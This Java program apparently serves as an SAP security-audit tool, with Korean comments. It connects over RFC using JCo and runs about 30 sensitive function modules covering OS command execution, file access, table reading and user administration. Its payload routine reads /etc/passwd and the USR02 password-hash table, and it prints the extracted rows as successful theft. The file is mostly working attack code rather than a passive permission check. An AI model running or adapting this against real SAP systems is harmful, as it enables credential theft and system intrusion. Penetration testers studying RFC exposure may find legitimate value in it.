import com.sap.conn.jco.*;
import java.util.Properties;
import java.io.File;
import java.io.FileOutputStream;

public class SapMasterAudit30 {
    public static void main(String[] args) {
        String destName = "FINAL_VULN_CHECK";
        Properties props = new Properties();

        // 1. 접속 정보 (현장 정보로 수정)
        props.setProperty("jco.client.ashost", "SAP_IP");
        props.setProperty("jco.client.sysnr",  "00");
        props.setProperty("jco.client.client", "100");
        props.setProperty("jco.client.user",   "USER_ID");
        props.setProperty("jco.client.passwd", "PASSWORD");

        try {
            createDestinationFile(destName, props);
            JCoDestination destination = JCoDestinationManager.getDestination(destName);
            
            System.out.println("======================================================");
            System.out.println("   [SAP RFC 30종 전수 보안 진단 및 실효성 리포트]");
            System.out.println("======================================================");

            // [진단 대상 30종 카테고리화]
            String[][] auditGroups = {
                {"[Group 1] 운영 업무 함수 (정상 권한 확인용)", 
                 "ZFT_RFC_OUTGOING_PMT_INFO", "ZFT_RFC_CUST_MASTER", "ZFT_RFC_VENDOR_DATA"},
                
                {"[Group 2] OS 명령 실행 및 시스템 침투 (RCE)", 
                 "SXPG_COMMAND_EXECUTE", "SXPG_CALL_SYSTEM", "RFC_REMOTE_EXEC", "RFC_REMOTE_PIPE", "RFC_ABAP_INSTALL_AND_RUN", "CAT_EXECUTE_CLI_COMMAND"},
                
                {"[Group 3] 파일 시스템 무단 접근 (File Leak)", 
                 "RZL_READ_FILE_LOCAL", "RZL_WRITE_FILE_LOCAL", "EPS_GET_DIRECTORY_LISTING", "EPS_FILE_DELETE", "RS_STP_FILE_SAVE", "ARCHIV_FILE_READ_FROM_NFS"},
                
                {"[Group 4] 데이터베이스 및 테이블 직접 탈취 (DB Leak)", 
                 "RFC_READ_TABLE", "BBP_RFC_READ_TABLE", "DSY_READ_TABLE", "TH_DB_TABLE_INFO", "DB_GET_TABLE_FIELDS", "RFC_GET_TABLE_ENTRIES"},
                
                {"[Group 5] 계정/세션 및 관리자 권한 장악 (Auth Leak)", 
                 "TH_USER_LIST", "TH_DELETE_USER", "BAPI_USER_GET_DETAIL", "BAPI_USER_CHANGE", "SUSR_RFC_USER_INTERFACE", "BAPI_USER_LOCK", "BAPI_USER_UNLOCK", "RFC_SYSTEM_INFO"}
            };

            for (String[] group : auditGroups) {
                System.out.println("\n" + group[0]);
                for (int i = 1; i < group.length; i++) {
                    executePoC(destination, group[i]);
                }
            }

        } catch (Exception e) {
            System.err.println("[!] 연결 실패: " + e.getMessage());
        }
    }

    public static void executePoC(JCoDestination dest, String rfcName) {
        System.out.print("  ▶ " + rfcName + " : ");
        try {
            JCoFunction function = dest.getRepository().getFunction(rfcName);
            if (function == null) {
                System.out.println("[안전] 서버에 존재하지 않음");
                return;
            }

            // [공격 페이로드 자동 주입]
            setExploitPayload(function, rfcName);
            
            function.execute(dest);

            // 실행 성공 시 데이터 출력
            System.out.println("[★★★탈취 성공★★★]");
            printEvidence(function, rfcName);

        } catch (JCoException e) {
            analyzeResult(e);
        }
    }

    private static void setExploitPayload(JCoFunction func, String rfcName) {
        if (rfcName.equals("RZL_READ_FILE_LOCAL")) {
            func.getImportParameterList().setValue("NAME", "/etc/passwd");
        } else if (rfcName.contains("READ_TABLE")) {
            func.getImportParameterList().setValue("QUERY_TABLE", "USR02");
            func.getImportParameterList().setValue("ROWCOUNT", 1);
        } else if (rfcName.equals("EPS_GET_DIRECTORY_LISTING")) {
            func.getImportParameterList().setValue("DIR_NAME", "/tmp");
        }
    }

    private static void printEvidence(JCoFunction func, String rfcName) {
        try {
            if (rfcName.equals("RZL_READ_FILE_LOCAL")) {
                JCoTable table = func.getTableParameterList().getTable("FILE_TBL"); // 또는 LINE_TBL
                if (table.getNumRows() > 0) {
                    table.setRow(0);
                    System.out.println("     ㄴ [데이터]: " + table.getString(0));
                }
            } else if (rfcName.contains("READ_TABLE")) {
                JCoTable table = func.getTableParameterList().getTable("DATA");
                if (table.getNumRows() > 0) {
                    table.setRow(0);
                    System.out.println("     ㄴ [데이터]: DB Row 탈취됨 (" + table.getString("WA").substring(0, 20) + "...)");
                }
            }
        } catch (Exception e) { /* 구조 상이 시 생략 */ }
    }

    private static void analyzeResult(JCoException e) {
        if (e.getGroup() == 104) {
            System.out.println("[!] 실행 거부 (하지만 설계도는 유출됨 - 과도한 권한)");
        } else if (e.getMessage().contains("required") || e.getMessage().contains("NOT_FOUND")) {
            System.out.println("[★실행 가능★] 권한 열려 있음 (파라미터 보정 시 즉시 탈취)");
        } else {
            System.out.println("[응답] " + e.getMessage());
        }
    }

    static void createDestinationFile(String name, Properties props) throws Exception {
        File destFile = new File(name + ".jcoDestination");
        try (FileOutputStream fos = new FileOutputStream(destFile)) {
            props.store(fos, "Master Audit");
        }
    }
}
